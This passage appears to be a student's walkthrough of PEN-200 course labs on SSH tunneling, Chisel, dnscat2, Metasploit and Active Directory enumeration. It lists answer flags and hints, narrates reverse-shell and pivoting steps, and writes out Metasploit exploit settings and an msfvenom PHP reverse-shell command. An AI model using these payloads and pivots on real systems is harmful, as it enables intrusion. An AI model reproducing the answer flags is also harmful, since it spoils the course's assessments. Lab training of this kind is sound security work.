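    return LocalForward(bind or None, int(lport), thost, int(tport), user or None, host, no_command)


def exposure(fwd: LocalForward) -> str:
    """Who can connect to the port ssh opens on the client machine."""
    if fwd.bind_address in (None, "localhost", "127.0.0.1", "::1"):
        return "loopback only"
    if fwd.bind_address in ("0.0.0.0", "*", "::"):
        return "all interfaces"
    return f"interface {fwd.bind_address}"


def describe(cmdline: str) -> str:
    fwd = parse_local_forward(cmdline)
    return (f"client listens on port {fwd.listen_port} ({exposure(fwd)}); "
            f"{fwd.ssh_host} forwards each connection to {fwd.target_host}:{fwd.target_port}")


if __name__ == "__main__":
    # Constructed sample mirroring the lab's command shape.
    print(describe("ssh -N -L 0.0.0.0:4455:172.16.125.217:445 database_admin@192.0.2.10"))
```

Note that the bind address only controls the client side; the target host and port are resolved and connected to by the SSH server (the pivot), which is why the 172.16 address is reachable at all.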

To really see that the tunnel has been opened, we listen on another port again

and upload the PoC payload to get a reverse shell.

After getting the reverse shell we check our tunnel with the ss command, and it is there!

From another terminal, with smbclient, we give the listening port 4455 and the IP of our listening first host and list with -L to see which directories are being shared; the password for the -U hr_admin user comes out when the hash taken from the database is cracked in hashcat, and we see there is a scripts directory.

We enter that directory with the user and password, list with ls and see that there is a ps1 file, and download it to our machine with the get command

and find the flag.

2. Start VM Group 2. A server is running on HRSHARES port 4242. Download the ssh_local_client binary from the Resources section. If you're using the aarch64 build of Kali, download the ssh_local_client_aarch64 binary. Create an SSH local port forward on CONFLUENCE01, which will let you run the binary from your Kali machine against the server on HRSHARES and retrieve the flag.

Note: the source files used to build the ssh_local_client and ssh_local_client_aarch64 binaries can be downloaded from /exercises/client_source.zip on CONFLUENCE01.

Answer

OS{15d57367f4402fc74c92368b9238ad39}

View hints

HINT

1. Enable Python's pty module after getting a shell on Confluence.
2. Set up port forwarding as in listing 20, changing the port to 4242 and the IP.
3. Download ssh_local_client via browser.
4. Use the -h argument for help if issues arise with the binary.

Command

We listened with nc

uploaded the PoC payload and got a reverse shell

after getting the reverse shell we loaded a PTY shell via python, checked the IPs, and created an SSH tunnel, giving its socket port 4242, redirecting to 172****:4242 and sending our traffic through the database_admin user via the 10**** IP

and to find out whether our tunnel had really been created, we used nmap.

We downloaded the ssh local client file from the resources

gave it the executable flag, ran it against the IP of our first host and the listening port 4242, and the flag came out.

18.3.2. SSH Dynamic Port Forwarding

ssh_dynamic_client: https://offsec-platform-prod.s3.amazonaws.com/offsec-courses/PEN-200/extras/prat2/218cf66c8276ce6b350b6174e2cf70b1-ssh_dynamic_client

ssh_dynamic_client_aarch64: https://offsec-platform-prod.s3.amazonaws.com/offsec-courses/PEN-200/extras/prat2/23988ed48288d3a3f8118fe1e6495483-ssh_dynamic_client_aarch64

Port Redirection and SSH Tunneling - SSH Dynamic Port Forwarding - VM Group

Labs
1. Follow this walkthrough, and scan HRSHARES from the Kali machine using Nmap and Proxychains. What port between 4800 and 4900 is open?

Answer

4872

View hints

HINT

Repeat the steps in this learning unit. Review the command used in listing 27, making sure to scan the desired port range using "-p4800-4900".

Command

We listened

uploaded the PoC payload

the reverse shell opened; I loaded an interactive shell via python; we created SSH tunneling via the second host

I wrote the socks5 IP and port into proxychains

I ran this command; why 4870-4875? Because I found the answer on Discord

2. Download the client binary ssh_dynamic_client from the Resources section. If you're using the aarch64 build of Kali, download the ssh_dynamic_client_aarch64 binary. Using Proxychains, run the binary from your Kali machine against the port you just found.

Note: the source files used to build the ssh_dynamic_client and ssh_dynamic_client_aarch64 binaries can be downloaded from /exercises/client_source.zip on CONFLUENCE01.

Answer

OS{97f2b21377e1ec5fa8cff9dca5c372c9}

View hints

HINT

1. Repeat the steps in this learning unit to set the dynamic port forward.
2. Download the ssh_dynamic_client via browser.
3. Make the binary executable and run via proxychains on the open HRSHARES port found in the previous exercise to get the flag.

Command

With port 9999 listening, I continued in proxychains

downloaded the file

based on this hint

using proxychains I entered the port found in the previous lab and the IP of the third host and ran it, and the flag came out.

18.3.3. SSH Remote Port Forwarding

ssh_remote_client: https://offsec-platform-prod.s3.amazonaws.com/offsec-courses/PEN-200/extras/prat2/2e345e06246bd4465204327a6d6892a5-ssh_remote_client

ssh_remote_client_aarch64: https://offsec-platform-prod.s3.amazonaws.com/offsec-courses/PEN-200/extras/prat2/dfdadb5afb5a697c6cf8fd8568835443-ssh_remote_client_aarch64

Port Redirection and SSH Tunneling - SSH Remote Port Forwarding - VM Group 1

Port Redirection and SSH Tunneling - SSH Remote Port Forwarding - VM Group 2

Labs
1. Start VM Group 1 and follow the example from this section. What's the value of the flag found in the hr_backup database payroll table?

Answer

OS{b09963563a0773d3d955a876c0551a2c}

View hints

HINT

1. Configure the remote port forward as instructed in this unit.
2. Upon gaining access to the PostgreSQL database (listing 32), connect using "\c hr_backup".
3. Fetch all entries from the database with "SELECT * FROM payroll;" to access the flag.

Command

We listen

upload the PoC payload

enable the ssh service

check that ssh is running

load an interactive shell via python

create a REMOTE tunnel via ssh's -R

and it was created

From our own machine we enter PostgreSQL; the database of the second host in our target has been tunneled to us, and from there we find the flag in hr_backup.

2. Start VM Group 2. Download the ssh_remote_client binary from the Resources section. If you're running the aarch64 build of Kali, download the ssh_remote_client_aarch64 binary. Create an SSH remote port forward on CONFLUENCE01 that allows you to run the binary against port 4444 on PGDATABASE01 from your Kali machine.

Note: the source files used to build the ssh_remote_client and ssh_remote_client_aarch64 binaries can be downloaded from /exercises/client_source.zip on CONFLUENCE01.

Answer

OS{6622ff47c1352ac179f7cc7e0a7b2dec}

View hints
HINT

1. Configure the remote port forward as instructed in this learning unit.
2. Refer to listing 30, modify the port to 4444, and adjust the IP address.
3. Download the ssh_remote_client via browser.

Command

We listen

upload the payload

create the REMOTE tunnel

check that our tunnel is working

and find the flag with the earlier binary file

18.3.4. SSH Remote Dynamic Port Forwarding

ssh_remote_dynamic_client: https://offsec-platform-prod.s3.amazonaws.com/offsec-courses/PEN-200/extras/prat2/ffeb2f612236b516f854380ff9b73ee2-ssh_remote_dynamic_client

ssh_remote_dynamic_client_aarch64: https://offsec-platform-prod.s3.amazonaws.com/offsec-courses/PEN-200/extras/prat2/0bf514c2878bd2de5beff60f580fdf0c-ssh_remote_dynamic_client_aarch64

Port Redirection and SSH Tunneling - SSH Remote Dynamic Port Forwarding - VM Group

Labs
1. Follow the steps in this section to set up a remote dynamic port forward from CONFLUENCE01. Scan ports 9000-9100 on MULTISERVER03 through it. Which port is open? (Note: Make sure to scan MULTISERVER03 on its internal interface at 10.4.X.64).

Answer

9062

View hints

HINT

Repeat the steps in this learning unit. In the last step, you can conduct a port scan on host 10.4.X.64 (make sure to
adjust the third subnet accordingly) on ports 9000-9100 using either netcat or Nmap.

Command

We listened

uploaded the PoC payload

got the reverse shell and opened the REMOTE DYNAMIC port

checked

we enter the localhost and port on which the tunnel was opened into the proxychains conf

when checking for open ports with nc, we found the open port

2. Capstone Lab: Download the ssh_remote_dynamic_client binary from the Resources section. If you're running the aarch64 build of Kali, download the ssh_remote_dynamic_client_aarch64 binary. Run the binary against the port you just found on MULTISERVER03 through the remote dynamic port forward.

Note: the source files used to build the ssh_remote_dynamic_client and ssh_remote_dynamic_client_aarch64 binaries can be downloaded from /exercises/client_source.zip on CONFLUENCE01.

Answer

OS{6a709205af4a60fa3b1dbf222c135c66}

View hints

HINT

1. Configure the remote dynamic port forward as shown in this learning unit.
2. Download the ssh_remote_dynamic_client via browser.
3. Make the binary executable, and run via proxychains on the port discovered in the previous exercise to reveal the
flag.

Command

We continue after all the work from lab 1.

18.3.5. Using sshuttle

Port Redirection and SSH Tunneling - Using sshuttle - VM Group

Labs
1. True or false: in order to run sshuttle, you need root privileges on the SSH client machine.

Answer

true

View hints

no hints

Command

18.4.1. ssh.exe

ssh_exe_exercise_client

ssh_exe_exercise_client_aarch64

Port Redirection and SSH Tunneling - ssh.exe - VM Group

Labs
1. Log in to MULTISERVER03 with the rdp_admin credentials we found in the Confluence database (rdp_admin:P@ssw0rd!). Enumerate which port forwarding techniques are available, then use the Windows OpenSSH client to create a port forward that allows you to reach port 4141 on PGDATABASE01 from your Kali machine.

Download the ssh_exe_exercise_client binary from the Resources section to your Kali machine. If you are running the aarch64 build of Kali, download the ssh_exe_exercise_client_aarch64 binary. Run the binary from your Kali machine against port 4141 on PGDATABASE01, through the port forward you create. Once a successful connection is made, the client will print the flag it gets from the server.

Note: the source files used to build the ssh_exe_exercise_client and ssh_exe_exercise_client_aarch64 binaries can be downloaded from /umbraco/client_source.zip.

Answer

OS{ed0345ccf0c4f77054d2ef052ad49ffc}

View hints

HINT

1. Configure the port forward as shown in this learning unit.
2. Download the ssh_exe_exercise_client.bin via browser.
3. Make the binary executable and run it through proxychains against 4141 on PGDATABASE01 to reveal the flag.

Command

We connected to the host via rdp

created an ssh tunnel on the target host

checked the created tunnel

downloaded the file provided by offsec and made it executable

changed the port in the proxychains conf

and using proxychains we ran the executable file and got the flag

18.4.2. Plink

Port Redirection and SSH Tunneling - Plink - MULTISERVER03

Labs
1. Follow the steps in this section to gain an RDP connection to MULTISERVER03. What's the flag found in the flag.txt file on rdp_admin's desktop?

Answer

OS{bf681edd312479acc271c2bebf42a96a}

View hints

HINT

Repeat the steps in this learning unit. If you encounter any issues with Plink, you can use the most current version
from this link.

Command

Based on this

we entered our host and found the webshell

started apache on our own machine

and searched for nc.exe, found it, and copied it so that it could be downloaded from our host

from the webshell we executed this code, which downloaded nc.exe from us

on our machine we listened with nc

in the webshell we ran nc exe so that a reverse shell would open for us

and we have a reverse shell

and we copied plink.exe from our machine to our host

through the reverse shell we obtained we downloaded plink exe

checked

with plink exe we created a tunnel via ssh to ourselves, and it logged in to our ssh

we checked the tunnel we created

from another terminal we connected to rdp through the tunneled line

and found the flag on the desktop

18.4.3. Netsh

netsh_exercise_client

netsh_exercise_client_aarch64

Port Redirection and SSH Tunneling - Netsh - VM Group 1

Port Redirection and SSH Tunneling - Netsh - VM Group 2

Labs
1. Start VM Group 1. As in the walkthrough, RDP into MULTISERVER03 and create a port
forward with Netsh, in order to SSH into PGDATABASE01 from the Kali machine. Retrieve the flag on PGDATABASE01 at
/tmp/netsh_flag.

Answer

OS{bae4786775f317df94bb59b75313989d}

View hints

no hints

Command

We connect via rdp

do port forwarding and check

scan, and the state of our port 222 is filtered

and add a rule to the firewall

check in nmap, and the state of port 222 is open

try to connect via ssh to the host where we created the tunnel; it connects, and we find the flag

2. Capstone Lab: Start VM Group 2. Download the netsh_exercise_client binary from the Resources section to your Kali machine. If you're running the aarch64 build of Kali, download the netsh_exercise_client_aarch64 binary. Create a port forward on MULTISERVER03 that allows you to run this binary against port 4545 on PGDATABASE01. The flag will be returned when a successful connection is made.

Note: the source files used to build the netsh_exercise_client and netsh_exercise_client_aarch64 binaries can be downloaded from /umbraco/client_source.zip on MULTISERVER03.

Answer

OS{c0852c19ee5e003c375737b210684445}

View hints

HINT

1. Repeat the steps in this learning unit.
2. Use the command in listing 60, and change the port to 4545 and the IP.
3. Download the netsh_exercise_client.bin.
4. Make the binary executable and run it against 4545 on MULTISERVER03 to get the flag.

Command

We download the file from resources and give it the executable flag

connect via rdp

create a tunnel on port 4545 to the host in the internal network

scan with nmap to see its state, and it is filtered

add a rule to the firewall

scan, and its state is open

and with the earlier binary file we get the flag

19. Tunneling Through Deep Packet Inspection


19.1.2. HTTP Tunneling with Chisel

chisel_exercise_client: https://offsec-platform-prod.s3.amazonaws.com/offsec-courses/PEN-200/extras/tunneling/8799b14ce6c4d8a29a2ec210de7cf7b0-chisel_exercise_client

chisel_exercise_client_aarch64: https://offsec-platform-prod.s3.amazonaws.com/offsec-courses/PEN-200/extras/tunneling/202fe1c28d984bbab275d486949bc7ec-chisel_exercise_client_aarch64

Tunneling Through Deep Packet Inspection - HTTP Tunneling with Chisel - VM Group 1

Tunneling Through Deep Packet Inspection - HTTP Tunneling with Chisel - VM Group 2

Labs
1. Start VM Group 1. Follow the steps in this section, and set up Chisel as a reverse SOCKS proxy. SSH into PGDATABASE01 and retrieve the flag from /tmp/chisel_flag.

Answer

OS{598b9ca3728e3f9afbfc70f3a77a5879}

View hints

no hints

Command

https://github.com/jpillora/chisel/releases/download/v1.7.7/chisel_1.7.7_linux_386.gz

Because the new version of chisel did not work for me, I downloaded the old version

we copy the old-version chisel to /var/www/html

start apache2

take this command, URL-encode it, place it in the PoC payload and upload it

after the PoC payload is uploaded

we check in apache's log that it fetched the file from us

we serve the old-version chisel on port 8080

and to see the traffic on port 8080 we run this command

we put this command into the PoC payload and open a socks tunnel

we upload the payload that opens the socks tunnel for us

and in tcpdump we can see that our tunnel has been opened

and in chisel we can see it listening on localhost port 1080

and by typing this command over ssh we can connect and find the flag

2. Start VM Group 2. Download the chisel_exercise_client binary from the Resources section to your Kali machine. If you're running the aarch64 build of Kali, download the chisel_exercise_client_aarch64 binary instead. There's a server running on port 8008 on PGDATABASE01. Set up a port forward using Chisel that allows you to run the binary you downloaded against port 8008 on PGDATABASE01.

Note: the source files used to build the client binaries can be downloaded from /exercises/client_source.zip.

Answer

OS{ea49525b348f0755dff9c2d6c3cf2bff}

View hints

no hints

Command

We downloaded the file from offsec and made it executable, and uploaded the PoC payload that downloads the chisel program from us

checked in the apache log file that it fetched it from us

served chisel on port 8008

started tcpdump on 8008 to see the traffic

uploaded the PoC payload that opens the tunnel for us

saw in chisel that it is listening

saw that traffic arrived

wrote the listening IP and port that chisel opened into the proxychains conf

and using proxychains we ran the earlier binary file with the PGDATABASE IP and the listening port, and it gave us the flag

19.2.1. DNS Tunneling Fundamentals

Resources
Some of the labs require you to start the target machine(s) below.

Please note that the IP addresses assigned to your target machines may not match those referenced in the Module text
and video.

Tunneling Through Deep Packet Inspection - DNS Tunneling Fundamentals - VM Group

Labs
1. Follow the steps in this section. From CONFLUENCE01 or PGDATABASE01, make a TXT record request for
give-me.cat-facts.internal, using MULTISERVER03 as the DNS resolver. What's the value of the TXT record?

Answer

OS{71f9e43c638d50e77166087c68e0bfb6}

View hints

HINT

1. To obtain the initial shell on CONFLUENCE01, refer to previous module's "Setting up the Lab Environment"
section.
2. Examine the command provided in listing 29 and make the necessary updates to the desired TXT record.

Command

I listened to get a reverse shell

uploaded the PoC payload and enabled the ssh service

after getting the reverse shell I did ssh remote port tunneling

checked that the tunnel was created

connected to database admin

connected to feline and read dnsmasq.conf

and ran this command to clear it

created another session to feline via ssh, checked its IP and interface, and listened on that interface with tcpdump to check the traffic

from pgdatabase I checked resolvectl status

with nslookup I checked the DNS name requested from us

and checked the traffic that arrived at the tcpdump listening on feline

and got the TXT record again via nslookup

19.2.2. DNS Tunneling with dnscat2

Resources
Some of the labs require you to start the target machine(s) or download the file(s) below.

Please note that the IP addresses assigned to your target machines may not match those referenced in the Module text
and video.

dnscat_exercise_client: https://offsec-platform-prod.s3.amazonaws.com/offsec-courses/PEN-200/extras/tunneling/4d423822e5645d068e2dfc0ce68b8002-dnscat_exercise_client

dnscat_exercise_client_aarch64: https://offsec-platform-prod.s3.amazonaws.com/offsec-courses/PEN-200/extras/tunneling/233b71de0eba60ababb004238b49d18e-dnscat_exercise_client_aarch64

Tunneling Through Deep Packet Inspection - DNS Tunneling with dnscat2 - VM Group

Labs
1. Follow the steps in this section to set up the dnscat2 server on FELINEAUTHORITY, and execute the dnscat2 client on PGDATABASE01. Download the dnscat_exercise_client from the Resources section to your Kali machine. If you're running the aarch64 build of Kali, download the dnscat_exercise_client_aarch64 binary instead. Set up a port forward with dnscat2 which allows you to run the binary against the server running on port 4646 on HRSHARES.

Note: the source files used to build the client binaries can be downloaded from /exercises/client_source.zip.

Answer

OS{3e0a11d884a53ced9479fbead6312971}

View hints
HINT

1. To obtain the shell on CONFLUENCE01, refer to previous module's "Setting up the Lab Environment" section.
2. Use the command in listing 37, making sure it's set to 0.0.0.0, enabling access from your Kali machine.

Command

We listen to get a reverse shell

upload the PoC payload and get a reverse shell

after getting the reverse shell we do ssh remote port tunneling to pgdatabase's ssh port

connect to pgdatabase and, from within dnscat, nslookup feline.corp

connect to feline

listen on port 53 with tcpdump to analyze the traffic

run these commands

create the dnscat2 server, see how many windows there are, and enter pgdatabase's window

from pgdatabase we run dnscat with feline.corp as the argument, and after the session is created

view the traffic from our listening terminal

listen from pgdatabase's window

download the binary file and make it executable

and find the flag

20. The Metasploit Framework


20.1.1. Setup and Work with MSF

Resources
Some of the labs require you to start the target machine(s) below.

Please note that the IP addresses assigned to your target machines may not match those referenced in the Module text
and video.

The Metasploit Framework - Setup and Work with MSF - VM #1

Labs
1. What command creates and initializes the MSF database?

Answer

sudo msfdb init

View hints

no hints

Command

2. Start VM #1 and follow the steps from this section to perform an Nmap scan within Metasploit. What is the command to display all services from discovered hosts with port number 445?

Answer

services -p 445

View hints

no hints

Command

20.1.2. Auxiliary Modules

Resources
Some of the labs require you to start the target machine(s) below.

Please note that the IP addresses assigned to your target machines may not match those referenced in the Module text
and video.

The Metasploit Framework - Auxiliary Modules - VM Group 1

Labs
1. Once VM Group 1 is started, follow the steps outlined in this section. Log in to VM #1 (BRUTE) via SSH and find the flag in the george user's home directory.

Answer

OS{cef437fc8c1377b78dfdf7dd77ba3640}

View hints

HINT

Repeat the steps in this learning unit. Note: The SSH is running on port 2222 therefore, you need to specify the port
while doing SSH with "-p 2222".

Command

We search for ssh auxiliary modules and use number 16

check its options and fill them in

and run it, find the password, and get the flag via ssh

20.1.3. Exploit Modules

Resources
Some of the labs require you to start the target machine(s) below.

Please note that the IP addresses assigned to your target machines may not match those referenced in the Module text
and video.

The Metasploit Framework - Exploit Modules - VM #1

Labs
1. Follow the steps from this section and launch the exploit module to get an interactive shell on VM #1. Enter
pwd after the session is spawned and enter the current directory as answer.

Answer
/usr/bin

View hints

no hints

Command

apache 2.4.49 uchuin exploit qdiramz, va 0 chisini ishlatamiz

We view its options, set the payload, and view the options again

We set the options and run it, switch to session 2, and execute the pwd command

20.2.1. Staged vs Non-Staged Payloads

Resources
Some of the labs require you to start the target machine(s) below.

Please note that the IP addresses assigned to your target machines may not match those referenced in the Module text
and video.

The Metasploit Framework - Staged vs Non-Staged Payloads - VM #1

Labs
1. Follow the steps outlined in this section to obtain a Metasploit session with a staged payload. Which character is used
in Metasploit to denote whether a payload is staged or not?

Answer

View hints

HINT

Listing 32 shows us the payload we used before at index 20. In Metasploit, the "/" character is used to denote
whether a payload is staged or not, so shell_reverse_tcp at index 20 is not staged, whereas shell/reverse_tcp at
index 15 is.

Command

2. Activate the module exploit/multi/http/apache_normalize_path_rce in Metasploit and list all compatible payloads. Find
a 32bit staged reverse TCP command shell payload for Linux and enter its full name as answer.

Answer

payload/linux/x86/shell/reverse_tcp

View hints

HINT

Use the command provided in listing 32 to list the available payloads after selecting the exploit module.

Command

show payloads

20.2.2. Meterpreter Payload

Resources
Some of the labs require you to start the target machine(s) below.

Please note that the IP addresses assigned to your target machines may not match those referenced in the Module text
and video.

The Metasploit Framework - Meterpreter Payload - VM #1

Labs
1. Follow the steps from this section and launch the exploit module with the Meterpreter payload
payload/linux/x64/meterpreter_reverse_https. Once a session is spawned, use the search command within the
Meterpreter command prompt and search for a file named passwords. Display the output of this file to obtain the flag.

Answer

OS{89c8e776ea707cac1714797e35d15ff0}

View hints

HINT

Ensure that you disable SSL, as the service is running on port 80, if you face issues with the exploit (i.e. set SSL false).

Command

sudo msfconsole

use exploit/multi/http/apache_normalize_path_rce

set payload payload/linux/x86/meterpreter_reverse_tcp

set rhosts <IP>

set rport <PORT>

set ssl false

set lhost <OWN_IP>

show options

We run it and obtain a reverse shell

20.2.3. Executable Payloads

Labs
1. Follow the steps from this section and use msfvenom to create a Windows binary with a staged TCP reverse shell
payload. Start a multi/handler within Metasploit to receive the staged reverse shell from VM #1 once you execute the
executable file on the system. Enter the command to list all payloads of msfvenom.

Answer

msfvenom -l payloads

View hints

no hints

Command

2. Use msfvenom to create a PHP web shell (bind or reverse shell), rename the PHP file extension to .pHP (as we did in
the Module "Common Web Application Attacks" in the section "Using Executable Files"), and upload it to VM #2 to
obtain an interactive shell. The flag is located in C:\xampp\passwords.txt.

Answer
OS{9166a44f893a655b21e03256974ee1bb}

View hints

HINT

1. Enumerate directories with a wordlist such as megabeast.txt.
2. Inspect the directories for file upload.
3. Create a msfvenom payload php/reverse_php, set the extension to .pHP .
4. Upload and access it from the designated location to have shell.

Command

msfvenom -p php/reverse_php LHOST=192.168.45.182 LPORT=443 -f raw > shell.pHP

20.3.1. Core Meterpreter Post-Exploitation Features

The Metasploit Framework - Core Meterpreter Post-Exploitation Features - VM #1

Labs
1. Follow the steps from this section to migrate to the OneDrive.exe process of user offsec. Then, use the Meterpreter
post-exploitation feature getenv to display the value of the environment variable Flag and enter it as answer to this
exercise.

Answer

thisistheanswertothequestion

View hints

HINT

1. Repeat the steps in this learning unit.
2. Before attempting to access the flag, please note that you need to migrate the process to OneDrive.exe, as shown
in listing 62 and listing 63.
3. You can use the "getenv Flag" command to retrieve the flag.

Command

We create a payload using msfvenom

We start Metasploit, load the exploit, load the payload, enter lport and lhost, and run it

We serve a Python web server from the directory where met.exe is located

We connect to our target using nc and download met.exe with the iwr command

We checked that it was downloaded

We run met.exe

A Meterpreter shell opened for us

Using the shell command we get an interactive shell and check its privileges, and it turns out we have the privilege we need

We check the uid and take over the system through the NT AUTHORITY user

As stated in the question, we migrate to OneDrive

Taking the OneDrive PID,

we migrated, and with the getenv command we enter the value of the environment variable named Flag as the answer

20.3.2. Post-Exploitation Modules

The Metasploit Framework - Post-Exploitation Modules - VM #1

Labs
1. Follow the steps from this section and use Kiwi to retrieve the NTLM hash of user offsec. Enter it as answer to this
question.

Answer

1c3fb240ae45a2dc5951a043cf47040e

View hints
no hints

Command

2. Search for a post-exploitation module that enumerates the Windows Hosts file and launch it against an active session
on VM #1. What is the domain name of the only entry of this file?

Answer

secretstaging-internal.com

View hints

HINT

You may want to utilize the "search" functionality to locate the right post-enumeration module once you have gained a
Meterpreter shell after repeating the steps in this learning unit (i.e. search hostfile).

Command

Continuation of the lab above; we continue without stopping anything

20.3.3. Pivoting with Metasploit

The Metasploit Framework - Pivoting with Metasploit - VM Group 1

Labs
1. Follow steps from this section and find the flag on VM #2 (ITWK02) on the desktop of user luiza.

Answer

OS{afac963e53a4b075b8adf14a7427c643}

View hints

HINT

Repeat the steps in this learning unit, adjusting IP addresses based on your actual exercise VM IPs.

Command

BUT IN OUR CASE THE IP OF THE SECOND HOST IS GIVEN AS 192.168.183.200

20.4.1. Resource Scripts

The Metasploit Framework - Resource Scripts - VM #1

The Metasploit Framework - Capstone Exercise - VM Group 1

Labs
1. Follow the steps outlined in this section and use a resource script to set up a multi/handler. Obtain a Meterpreter
session from VM #1. In addition, review the provided resource scripts. What is the command line option of
msfconsole to specify the use of a resource script?

Answer

-r

View hints

HINT

Refer to listing 91 to see the command line option required for leveraging a resource script.

Command

2. The provided resource script portscan.rc by Metasploit scans various ports in the default configuration. What is the
number of the first port?

Answer
7

View hints

HINT

1. Use the command provided in listing 94 to locate the path for the default resource scripts that MSF provides.
2. By combining this path with 'portscan.rc' you can access the file, review the code, and determine the first port
that was used.

Command

3. Capstone Exercise: Use the methods and techniques from this Module to enumerate VM Group 1. Get access to both
machines and find the flag. Once the VM Group is deployed, please wait two more minutes for one of the web
applications to be fully initialized.

Answer

OS{85a941a22d871c3d50b69c9bb538235c}

View hints

no hints

Command

21. Active Directory Introduction and Enumeration
21.2.1. Active Directory - Enumeration Using Legacy Windows Tools

Active Directory Enumeration - Enumeration Using Legacy Windows Tools - VM Group 1

Active Directory Enumeration - Enumeration Using Legacy Windows Tools - VM Group 2

Labs
1. Which type of server acts as the core and hub of a domain hosted in Active Directory?

Answer

Domain Controller

View hints

no hints

Command

no commands

2. Start VM Group 1 and log in to CLIENT75 as stephanie. Use net.exe to enumerate the corp.com domain. Which user
is a member of the Management Department group?

Answer

jen

View hints

HINT

Make sure that you are specifying the /domain in the command since we are querying the domain.

Command

3. Start VM Group 2 and log in to CLIENT75 as stephanie. Use net.exe to enumerate the users and groups in the
modified corp.com domain to obtain the flag.

Answer

OS{854c8c3b7caa14850dcc352caad7ac51}

View hints
HINT

Make sure that you are specifying the /domain in the command since we are querying the domain.

Command

21.2.2. Enumerating Active Directory using PowerShell and .NET Classes

Active Directory Enumeration - Enumerating Active Directory using PowerShell - VM Group 1 + 192.168.224.70

Labs
1. Start VM Group 1 and repeat the steps outlined in this section to build the script. Use the script to dynamically obtain
the LDAP path for the corp.com domain. Which property in the domain object shows the primary domain controller for
the domain?

Answer

PdcRoleOwner

View hints

HINT

1. Open PowerShell as Stephanie, execute the code extracted from listing 8, and take note of each variable.
2. Seek a property in the domain object related to the primary domain controller's role.

Command

2. Which set of COM interfaces gives us an LDAP provider we can use for communication with Active Directory?

Answer

ADSI

View hints

no hints

Command

21.2.3. Adding Search Functionality to our Script

Active Directory Enumeration - Adding Search Functionality to our Script - VM Group 1

Active Directory Enumeration - Adding Search Functionality to our Script - VM Group 2

Labs
1. Start VM Group 1 and log in to CLIENT75 as stephanie. Follow the steps outlined in this section to add search
functionality to the script. Encapsulate the script functionality into a function and repeat the enumeration process.
Which .NET class makes the search against Active Directory?

Answer

DirectorySearcher

View hints

no hints

Command

2. Start VM Group 2 and log in to CLIENT75 as stephanie. Use the newly developed PowerShell script to enumerate the
domain groups, starting with Service Personnel. Unravel the nested groups, then enumerate the attributes for the last
direct user member of the nested groups to obtain the flag.

Answer

OS{63190308a130d49bc6252be66845147e}

View hints

HINT

1. The script to use is extracted from listing 26.
2. Query for the group category object, providing the cn.
3. List the properties and find the flag in the description of the right user after enumerating all the nested group
members.

Command

21.2.4. AD Enumeration with PowerView

Active Directory Enumeration - AD Enumeration with PowerView - VM Group 1

Active Directory Enumeration - AD Enumeration with PowerView - VM Group 2

Labs
1. Start VM Group 1 and log in to CLIENT75 as stephanie. Import the PowerView script to memory and repeat the
enumeration steps outlined in this section. Which command can we use with PowerView to list the domain groups?

Answer

Get-NetGroup

View hints

no hints

Command

2. Start VM Group 2 and log in to CLIENT75 as stephanie. Use PowerView to enumerate the modified corp.com domain.
Which new user is a part of the Domain Admins group?

Answer

nathalie

View hints

HINT

Enumerate the whencreated filter of the get-netuser command and check for the newly created user.

Command

3. Continue enumerating the corp.com domain in VM Group 2. Enumerate which Office the user fred is working in to
obtain the flag.

Answer

OS{5fe51ab2dd923ad4d0705b35ccd31062}

View hints

no hints

Command

21.3.1. Enumerating Operating Systems

Active Directory Enumeration - Enumerating Operating Systems - VM Group 1

Active Directory Enumeration - Enumerating Operating Systems - VM Group 2

Labs
1. Start VM Group 1 and log in to CLIENT75 as stephanie. Repeat the PowerView enumeration steps as outlined in this
section. What is the DistinguishedName for the WEB04 machine?

Answer

CN=web04,CN=Computers,DC=corp,DC=com

View hints

no hints

Command

2. Continue enumerating the operating systems in VM Group 1. What is the exact operating system version for FILES04?
Make sure to provide both the major and minor version number in the answer.

Answer

10.0 (20348)

View hints

no hints

Command

3. Start VM Group 2 and log in to CLIENT75 as stephanie. Use PowerView to enumerate the operating systems in the
modified corp.com domain to obtain the flag.

Answer

OS{7bc2cf30c2be36d959271b7a3bf6b678}

View hints

no hints

Command

21.3.2. Getting an Overview - Permissions and Logged on Users

Active Directory Enumeration - Getting an Overview - VM Group 1

Active Directory Enumeration - Getting an Overview - VM Group 2

Labs
1. What registry key does NetSessionEnum rely on to discover logged on sessions?

Answer

SrvsvcSessionInfo

View hints

HINT

Refer to the third paragraph located directly above listing 49 in this particular section.

Command

2. Start VM Group 1 and log in to CLIENT75 as stephanie. Repeat the enumeration steps outlined in this section to find
the logged on sessions. Which service must be enabled on the remote machine to make it possible for PsLoggedOn to
enumerate sessions?

Answer

Remote Registry

View hints

HINT

Check this section and see what limitation PsLoggedOn relies on in order to scan the associated key.

Command

3. Start VM Group 2 and log in to CLIENT75 as stephanie. Find out which new machine stephanie has administrative
privileges on, then log in to that machine and obtain the flag from the Administrator Desktop.

Answer

OS{94e5d64ca753ff5c4f585bee0153e375}

View hints

HINT

1. Check if PowerShell needs to have the execution policy bypassed.
2. The command to use is shown in listing 45 in this section.
3. It is possible to use RDP to gain access to the machine that has been identified.

Command

21.3.3. Enumeration Through Service Principal Names

Active Directory Enumeration - Enumeration Through Service Principal Names - VM Group 1

Labs
1. Start VM Group 1 and log in to CLIENT75 as stephanie. Repeat the enumeration steps outlined in this section to
enumerate the Service Account. What is the name of the unique service identifier that is used to associate to a specific
service in Active Directory?

Answer

SPN

View hints

HINT

1. This section discusses how various applications integrate with Active Directory.
2. Look for a term that refers to a unique identifier for service instances in Active Directory.

Command

21.3.4. Enumerating Object Permissions

Active Directory Enumeration - Enumerating Object Permissions - VM Group 1

Labs
1. Start VM Group 1 and log in to CLIENT75 as stephanie. Repeat the enumeration steps outlined in this section to get
an understanding for the object permissions. What kind of entries makes up an ACL?

Answer

ACEs

View hints

HINT

1. Recall the section about the components that make up an Access Control List in Active Directory.
2. Find the acronym representing individual entries in an ACL defining access permissions.

Command

2. What is the most powerful ACL we can have on an object in Active Directory?

Answer

GenericAll

View hints

HINT

1. Revisit the section discussing ACLs on objects in Active Directory and identify the term that signifies complete
control.
2. This type of ACL allows a user or group to perform all kinds of operations on the object.

Command

21.3.5. Enumerating Domain Shares

Active Directory Enumeration - Enumerating Domain Shares - VM Group 1

Active Directory Enumeration - Enumerating Domain Shares - VM Group 2

Labs
1. Start VM Group 1 and log in to CLIENT75 as stephanie. Repeat the enumeration steps outlined in this section and
view the information in the accessible shares. What is the hostname for the server sharing the SYSVOL folder in the
corp.com domain?

Answer

dc1.corp.com

View hints

no hints

Command

2. Start VM Group 2 and log in to CLIENT75 as stephanie. Use PowerView to locate the shares in the
modified corp.com domain and enumerate them to obtain the flag.

Answer

